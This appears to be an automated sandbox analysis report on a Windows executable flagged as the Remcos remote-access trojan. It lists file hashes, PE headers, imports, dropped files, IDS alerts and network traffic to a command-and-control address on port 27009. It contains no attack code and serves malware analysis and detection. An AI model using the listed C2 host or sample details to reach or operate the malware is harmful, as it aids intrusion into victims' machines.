                  Entropy (8bit):1.9624533226525045
                  Encrypted:false
                  SSDEEP:384:VB+8E6WePEBh693djAAOFSViiLNXNKL6AGMEzdlTu1+:qePEBsVdymLNQLbGRzdFK
                  MD5:65F47A2D56859E2D864C6407E5FCE41A
                  SHA1:5228E2A9B8CC13946B2E4E688D298488EA157695
                  SHA-256:EA3493B8424C4FFE7FCAC03037EFDBCD517B581097AE1745E161DFAD493F4BF4
                  SHA-512:00AA4DD4F721D5CBC367F625411BA0D0204369348161FA3C9AD83E9E30F39A991BD0A050E4AD4C45A0E980B43827A1E2A0115626C79C82BB6C1F246258DA3A9E
                  Malicious:false
                  Preview:MDMP....... .......^..d............t.......................$...p"..........HS..........`.......8...........T...........p6.............."...........$...................................................................U...........B.......%......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8346
                  Entropy (8bit):3.705493125943907
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqx6jsL6YydSUrJmbgmfvSFAjAK+pBT89bcnnsf/R40m:RrlsNik6U6Y4SUrJCgmfvSFAjAQcnsfA
                  MD5:7257F91D93259367548063E3CF22E48A
                  SHA1:5BD1F16616925594C7D3565176BA0B740B98EF3C
                  SHA-256:517AC1552D6BBD186278CA3DB72382EBF2EDCDF7822F2D8140EC8770B8EE6893
                  SHA-512:A416B710F1147173174A8C8E76499DB56F186E2E32C9B58CC6C350EE9E04D10CDFD4CD29162E06AC6A5B8204B2DF57CBA2E0858CA8231D93A89D9A9387FE67B9
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Users\user\Desktop\BiU282bjyR.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):945
                  Entropy (8bit):4.994779790316133
                  Encrypted:false
                  SSDEEP:12:tklJnd6UGkMyGWKyMPVGADxapaiH8GdAPORkoao9W7im51w799CFF6RjSat5Rt8L:qlNdVauKyM85266m7PCeCLn
                  MD5:3A320A00C6ECC1BAE20C00A66631696F
                  SHA1:C1797318B9169D374D70A97761768713584AF528
                  SHA-256:79BD6579B5A4EBCBBC8BDB27E5C070B062477F0F043239DF518348DC2986759E
                  SHA-512:D004EBD672E5F4C8362A7A79784760E92BE9F6F2AE1254CAD496F70D628B0A936B44CBCFCD41C1B0505208F21893D41BED6B986067149FB17A6AEE248A2D7BEB
                  Malicious:false
                  Preview:{. "geoplugin_request":"84.17.52.42",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Zurich",. "geoplugin_region":"Zurich",. "geoplugin_regionCode":"ZH",. "geoplugin_regionName":"Zurich",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.3682",. "geoplugin_longitude":"8.5671",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.8786.}
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1572864
                  Entropy (8bit):4.374466102074607
                  Encrypted:false
                  SSDEEP:12288:CocTQC4Lh9c+g1Ep7cMZK8yrWzte7y/5rmZrmQ0ithr7+i+invToDdE+:NcTQC4Lh9c+g1EEgq
                  MD5:51D5A989C723876E75FAE5D58BCF2AEC
                  SHA1:EDED1FC7811166B58E6C9DBDFD269A9AC076471C
                  SHA-256:CC2FD3C46EDBC75FDC7325F5FD0FBD6149A0417702060AB956047C7C5E0AAB28
                  SHA-512:26239063461B279EB09376833235B1C81879C6AAB884C27AB704853FFF83796CFB56AC54A66E4B1785C563C8CAFA39D0DD28070DB9D20C375078A985EA8F3D10
                  Malicious:false
                  Preview:regf........p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm>...#...............................................................................................................................................................................................................................................................................................................................................]...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.7387450605764565
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 91.23%
                  • Win32 Executable Borland Delphi 7 (665061/41) 6.07%
                  • Win32 Executable Borland Delphi 6 (262906/60) 2.40%
                  • Win32 Executable Delphi generic (14689/80) 0.13%
                  • Windows Screen Saver (13104/52) 0.12%
                  File name:BiU282bjyR.exe
                  File size:1'232'384 bytes
                  MD5:111355b58d38248c4f0d96a509ca44e5
                  SHA1:24c5d3159af9d992a0a26368cf65ba313f3e8be4
                  SHA256:c67621749a60aa3546fbfb190a151ad3339d2a96a89e83491acb396709e9cb22
                  SHA512:8b7f934593d6c74f90debec2f1b8c9320c266cf1c3f93bae3df6cc417103edadd2f48b1d61a3f31853b3c06b3f1562719c2297a63a4f84d20ac4b80581834e57
                  SSDEEP:24576:H/LsqswSUjWPTu1ipkwqqVn8EvDC5Gk2D9f:HYLHPAiT8EGc
                  TLSH:7B458C93F380147FF1A6C63BAC8E7BFD94A16F4D190A08412EB42F48FF6D641699474A
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                  Icon Hash:953a5a92e9ccf429
                  Entrypoint:0x458058
                  Entrypoint Section:CODE
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  DLL Characteristics:
                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:ab49388f1a819498b47a540e48d11f55
                  Instruction
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF0h
                  mov eax, 00457DE0h
                  call 00007F9268B3F5A1h
                  mov eax, dword ptr [0045A854h]
                  mov eax, dword ptr [eax]
                  call 00007F9268B89BEDh
                  mov ecx, dword ptr [0045A890h]
                  mov eax, dword ptr [0045A854h]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [004578F8h]
                  call 00007F9268B89BEDh
                  mov eax, dword ptr [0045A854h]
                  mov eax, dword ptr [eax]
                  call 00007F9268B89C61h
                  call 00007F9268B3D2FCh
                  lea eax, dword ptr [eax+00h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5c0000x1fcc.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xcb200.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x6604.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x5f0000x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  CODE0x10000x570a00x57200False0.5289886343256814data6.538459274263289IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  DATA0x590000x1a3c0x1c00False0.4321986607142857data4.382612796170792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  BSS0x5b0000xe250x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0x5c0000x1fcc0x2000False0.3729248046875data5.024694654459872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .tls0x5e0000x400x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata0x5f0000x180x200False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .reloc0x600000x66040x6800False0.6121544471153846data6.640910104811994IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .rsrc0x670000xcb2000xcb200False0.5847091346153847data6.517210786725181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  F34RT13T0x67d240x9dbfcdataEnglishUnited States0.6533444764292569
                  RT_CURSOR0x1059200x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                  RT_CURSOR0x105a540x134data0.4642857142857143
                  RT_CURSOR0x105b880x134data0.4805194805194805
                  RT_CURSOR0x105cbc0x134data0.38311688311688313
                  RT_CURSOR0x105df00x134data0.36038961038961037
                  RT_CURSOR0x105f240x134data0.4090909090909091
                  RT_CURSOR0x1060580x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                  RT_BITMAP0x10618c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                  RT_BITMAP0x10635c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                  RT_BITMAP0x1065400x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                  RT_BITMAP0x1067100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                  RT_BITMAP0x1068e00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                  RT_BITMAP0x106ab00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                  RT_BITMAP0x106c800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                  RT_BITMAP0x106e500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                  RT_BITMAP0x1070200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                  RT_BITMAP0x1071f00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                  RT_BITMAP0x1073c00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                  RT_ICON0x1074a80x904dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9977531739801305
                  RT_ICON0x1104f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.12377262510351354
                  RT_ICON0x120d200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 0EnglishUnited States0.18160813308687615
                  RT_ICON0x1261a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.1615493623051488
                  RT_ICON0x12a3d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.2245850622406639
                  RT_ICON0x12c9780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.25
                  RT_ICON0x12da200x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.364344262295082
                  RT_ICON0x12e3a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.4166666666666667
                  RT_DIALOG0x12e8100x52data0.7682926829268293
                  RT_STRING0x12e8640x2b4data0.42485549132947975
                  RT_STRING0x12eb180x3b4data0.34282700421940926
                  RT_STRING0x12eecc0x348data0.40595238095238095
                  RT_STRING0x12f2140x1f0data0.4213709677419355
                  RT_STRING0x12f4040x1c0data0.44419642857142855
                  RT_STRING0x12f5c40xdcdata0.6
                  RT_STRING0x12f6a00x2f4data0.4497354497354497
                  RT_STRING0x12f9940xdcdata0.5863636363636363
                  RT_STRING0x12fa700x10cdata0.5746268656716418
                  RT_STRING0x12fb7c0x33cdata0.4311594202898551
                  RT_STRING0x12feb80x3ccdata0.37448559670781895
                  RT_STRING0x1302840x370data0.3931818181818182
                  RT_STRING0x1305f40x42cdata0.36891385767790263
                  RT_STRING0x130a200x114data0.5
                  RT_STRING0x130b340xe4data0.5482456140350878
                  RT_STRING0x130c180x24cdata0.477891156462585
                  RT_STRING0x130e640x4a4data0.29208754208754206
                  RT_STRING0x1313080x358data0.4158878504672897
                  RT_STRING0x1316600x2b4data0.4060693641618497
                  RT_RCDATA0x1319140x10data1.5
                  RT_RCDATA0x1319240x354data0.6913145539906104
                  RT_RCDATA0x131c780x108Delphi compiled form 'Thorlqrq'0.8068181818181818
                  RT_GROUP_CURSOR0x131d800x14Lotus unknown worksheet or configuration, revision 0x11.25
                  RT_GROUP_CURSOR0x131d940x14Lotus unknown worksheet or configuration, revision 0x11.25
                  RT_GROUP_CURSOR0x131da80x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x131dbc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x131dd00x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x131de40x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x131df80x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_ICON0x131e0c0x76dataEnglishUnited States0.7457627118644068
                  RT_VERSION0x131e840x2a4dataEnglishUnited States0.4940828402366864
                  DLLImport
                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                  user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                  kernel32.dllSleep
                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                  shell32.dllShellExecuteExW
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3212.23.211.23849725270092032776 08/31/23-17:57:02.741057TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin4972527009192.168.2.3212.23.211.238
                  212.23.211.238192.168.2.327009497252032777 08/31/23-17:57:02.818401TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response2700949725212.23.211.238192.168.2.3
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 31, 2023 17:57:02.718616009 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:02.738822937 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:02.739058018 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:02.741056919 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:02.811446905 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:02.818401098 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:02.870146036 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:02.890023947 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:02.932617903 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:04.859107018 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:04.929227114 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:10.039567947 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:57:10.065515995 CEST8049726178.237.33.50192.168.2.3
                  Aug 31, 2023 17:57:10.065665960 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:57:10.065952063 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:57:10.095884085 CEST8049726178.237.33.50192.168.2.3
                  Aug 31, 2023 17:57:10.096029043 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:57:10.148854971 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:10.218312979 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:11.095581055 CEST8049726178.237.33.50192.168.2.3
                  Aug 31, 2023 17:57:11.095705986 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:57:17.995325089 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:18.043266058 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:19.139785051 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:19.209798098 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:47.996212006 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:57:48.045866013 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:49.099760056 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:57:49.169913054 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:58:17.997649908 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:58:18.048418045 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:58:18.550288916 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:58:18.620901108 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:58:48.000139952 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:58:48.051615000 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:58:48.450874090 CEST4972527009192.168.2.3212.23.211.238
                  Aug 31, 2023 17:58:48.520229101 CEST2700949725212.23.211.238192.168.2.3
                  Aug 31, 2023 17:58:58.943857908 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:58:59.255769014 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:58:59.864965916 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:59:01.068270922 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:59:03.474745989 CEST4972680192.168.2.3178.237.33.50
                  Aug 31, 2023 17:59:08.287559032 CEST4972680192.168.2.3178.237.33.50
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 31, 2023 17:57:10.009466887 CEST5645253192.168.2.38.8.8.8
                  Aug 31, 2023 17:57:10.030405998 CEST53564528.8.8.8192.168.2.3
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Aug 31, 2023 17:57:10.009466887 CEST192.168.2.38.8.8.80x4e09Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
